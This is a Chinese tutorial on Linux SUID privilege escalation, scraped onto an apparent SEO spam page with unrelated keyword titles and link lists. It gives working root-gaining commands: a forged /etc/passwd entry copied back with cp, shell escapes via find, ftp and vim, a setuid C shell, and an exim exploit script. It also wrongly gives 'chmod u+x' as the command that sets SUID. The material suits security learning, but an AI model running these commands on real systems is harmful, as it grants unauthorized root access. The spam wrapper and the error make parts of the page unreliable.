当前位置: 首页 > wzjs >正文

包头教育云网站建设织梦转wordpress插件下载

包头教育云网站建设,织梦转wordpress插件下载,上海网站建设 上海网站制作,网站如何维护Linux提权之suid提权 suid简介 在Linux系统中的文件,通常有rwx也就是读、写、执行三种权限,但其实还有第四种权限,也就是suid权限。在执行拥有suid权限的文件的过程中,会获得文件属主的权限。例如,当cat命令具有suid…

Linux提权之suid提权

suid简介

在Linux系统中的文件,通常有rwx也就是读、写、执行三种权限,但其实还有第四种权限,也就是suid权限。在执行拥有suid权限的文件的过程中,会获得文件属主的权限。例如,当cat命令具有suid权限,那么用户就可以查看任何文件,如果只是普通权限,那么只能查看一些普通用户可以看的文件,无法查看root用户的文件。

SUID(Set UID):

suid权限仅对二进制程序有效(binary program);
执行者对于该程序需要具有x的可执行权限;
本权限仅在执行该程序的过程中有效(run-time);
执行者将具有该程序拥有者的权限。

在说suid提权之前,我先说一下如何赋予文件suid权限和如何查找具有suid权限的文件。

chmod u+x a.txt //赋予a.txt suid权限
在这里插入图片描述

find / -perm -u=s -type f 2>/dev/null
参数:/表示从文件系统的顶部(根)开始,查找每个目录-perm表示搜索后面的权限-u=s表示查找具有suid权限的文件-type表示我们正在寻找的文件类型f 表示普通文件,而不是目录或特殊文件2表示到进程的第二个文件描述符,即 stderr(标准错误)>表示重定向/dev/null是一个特殊的文件系统对象,它会丢弃写入其中的所有内容。

在这里插入图片描述

cp提权

当我们运行cp(复制)命令时,就会有root权限,也就是说我们可以复制任意文件。众所周知/etc/passwd这个文件是保存用户的,只有root才可以修改。但是现在我们的cp命令具有root权限,那我们是不是可以把/etc/passwd这个文件的内容复制到一个新建的文件中,然后添加一个root用户,最后再复制回去不就完成对/etc/passwd文件的修改了吗,之后再切换我们刚刚添加的root用户即可。
这里我复制到a.txt中
cp /etc/passwd a.txt
在这里插入图片描述
在添加之前,我们先在kali生成一个密码,用来切换用户用的。

openssl passwd -1 -salt 1×2×3 abc123 //-1为md5,-salt指定盐(随意)密码abc123
在这里插入图片描述

然后按照/etc/passwd文件里第一条root用户的格式来添加就行,把x换成我们刚刚生成的密码test:$1$1×2×3$v7HAeao264EWdUs17q7XK/:0:0:root:/root:/bin/bash

在这里插入图片描述

再复制回去就ok了。
cp a.txt /etc/passwd
切换我们刚刚添加的用户,并输入刚刚生成的密码即可变成root。
在这里插入图片描述

find提权

find也可以用来提权,在执行find命令的过程中利用exec参数来指定其他的命令。例如,在执行find命令过程中又执行whoami命令,因为在执行find命令过程中权限为root,所以最后输出root。
在这里插入图片描述

那我们只需把whoami换成/bin/sh,以root的身份新建一个交互终端即可,值得注意的是,要找的文件必须是存在滴

find a.txt -exec "/bin/sh" -p \;

在这里插入图片描述

vim提权

当vim被赋予suid权限时,可以编辑任意文件。那么我们直接在/etc/passwd添加个用户不就行了吗,和上面的cp差不多就不演示了。

还有一个方法是去修改/etc/sudoers文件,在/etc/sudoers文件中把普通用户的权限配置为root权限,按照root的方式配置即可。
在这里插入图片描述

然后再sudo bash就会获取一个root的shell,不过第一次要输入当前用户的密码,有点鸡肋

可执行文件提权

除了一些系统的可执行命令,自己写的可执行脚本也可以提权,以c语言为例。在kali编译好后再传进靶机里面,如果靶机有环境的话直接在班级编译也行。

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>int main()
{setuid(geteuid());system("/bin/bash");return 0;
}

然后复制到/bin目录下,再添加权限,但是在bin目录下的话普通用户就没有权限给予shell文件suid权限了???????
在这里插入图片描述

只能切换root用户再给予shell文件777权限和suid权限了,最后再切换回普通用户执行shell文件即可。个人觉得超级无敌鸡肋,既然我都能切换root用户给予权限了,那我还提个集贸权啊。在这里插入图片描述

ftp提权

先输入ftp ,再在底行输入!/bin/sh -p即可
在这里插入图片描述

exim4提权

先查看版本信息
/usr/sbin/exim4 --version
在这里插入图片描述

到kali漏洞库去找提权脚本,根据脚本适用版本以及脚本信息来判断使用哪个脚本。这里我们就用第三个,Privilege Escalation是权限提升的意思。
searchsploit exim 4.8
在这里插入图片描述

脚本上传到靶机,给予执行权限。
在这里插入图片描述

两种使用方式,不知道使用哪种就两种都试试即可。

./46996.sh -m netcat
./46996.sh -m setuid

在这里插入图片描述
在这里插入图片描述

总结

以上总结的是常见的suid提权,后续会持续跟新。


文章转载自:

http://CCoZvHuH.xqgtd.cn
http://9Aru6umH.xqgtd.cn
http://zBki9oth.xqgtd.cn
http://HYqbSv9S.xqgtd.cn
http://yW58rgnU.xqgtd.cn
http://5iAftwpD.xqgtd.cn
http://F49yOSmk.xqgtd.cn
http://ldnrnrcB.xqgtd.cn
http://1disyHnn.xqgtd.cn
http://nh0yhlMX.xqgtd.cn
http://TDR9w6wd.xqgtd.cn
http://RQv0UNiQ.xqgtd.cn
http://MKEiPk3r.xqgtd.cn
http://j7FEaWPG.xqgtd.cn
http://sBBvA05q.xqgtd.cn
http://t2QCLMSz.xqgtd.cn
http://3Zzy6pXs.xqgtd.cn
http://jZ2ypbXf.xqgtd.cn
http://EQDyLmWE.xqgtd.cn
http://FjpdZMIb.xqgtd.cn
http://llRAPDS7.xqgtd.cn
http://oN7NAUq1.xqgtd.cn
http://mnK3ogXB.xqgtd.cn
http://TRFlXtVR.xqgtd.cn
http://jJfybGIH.xqgtd.cn
http://mWiQgmw3.xqgtd.cn
http://SABufK8M.xqgtd.cn
http://cuA32I36.xqgtd.cn
http://JEA2ENlb.xqgtd.cn
http://dIv3t28K.xqgtd.cn
http://www.dtcms.com/wzjs/768757.html

相关文章:

  • 专业做网站电话网站模板免费下载
  • html网站引导页模板抖音搜索推广首选帝搜软件平台
  • 怎么用模板做网站会计网站模板
  • 万网网站空间服务范围及费用网站推广策划书 精品
  • 复兴网站制作免费模型网站
  • 网站建设源码是什么seo全网推广营销软件
  • 怎样提升网站流量快速开发手机网站
  • 门户网站建设哪家便宜杭州做网站找力果
  • 网站及网页设计费用免费上传图片的网址
  • 广州编程课程培训机构排名seo网站建设步骤
  • iframe网站后台模板软件平台架构
  • 合肥有哪些做网站的慈溪seo排名
  • 主题资源网站制作平台广东好的网络营销机构
  • 微网站特点公众号投放平台
  • 简述网站建设基本过程wordpress主题模版开发
  • 网站优化的重要性网站开发合作运营平台合同
  • 网站制作公司官网首页在线制作表白网站
  • 德州市建设工程协会网站泰州网站建设制作工作室
  • 韩国做游戏的电影 迅雷下载网站怎么用asp.net做网站
  • 厦门建设网站首页工作证模板word
  • 江门北京网站建设手工制作钟表
  • 做百度推广送网站wordpress的数据库在那里
  • 企业核名网站百度网站收录提交入口
  • 企业网站建设规划书的内容建设公司网站要注意哪些
  • 网站备案名称几个字软件外包公司怎么找业务
  • 网站编辑好做吗wordpress视频站主题
  • 石家庄市城乡建设局网站中国建设银行u盾官方网站
  • 建设租车网站泽国镇规划建设局网站
  • 公司做的网站费用如何做账为什么上不了建设银行个人网站
  • 网站制作基本规则怎么搭建php网站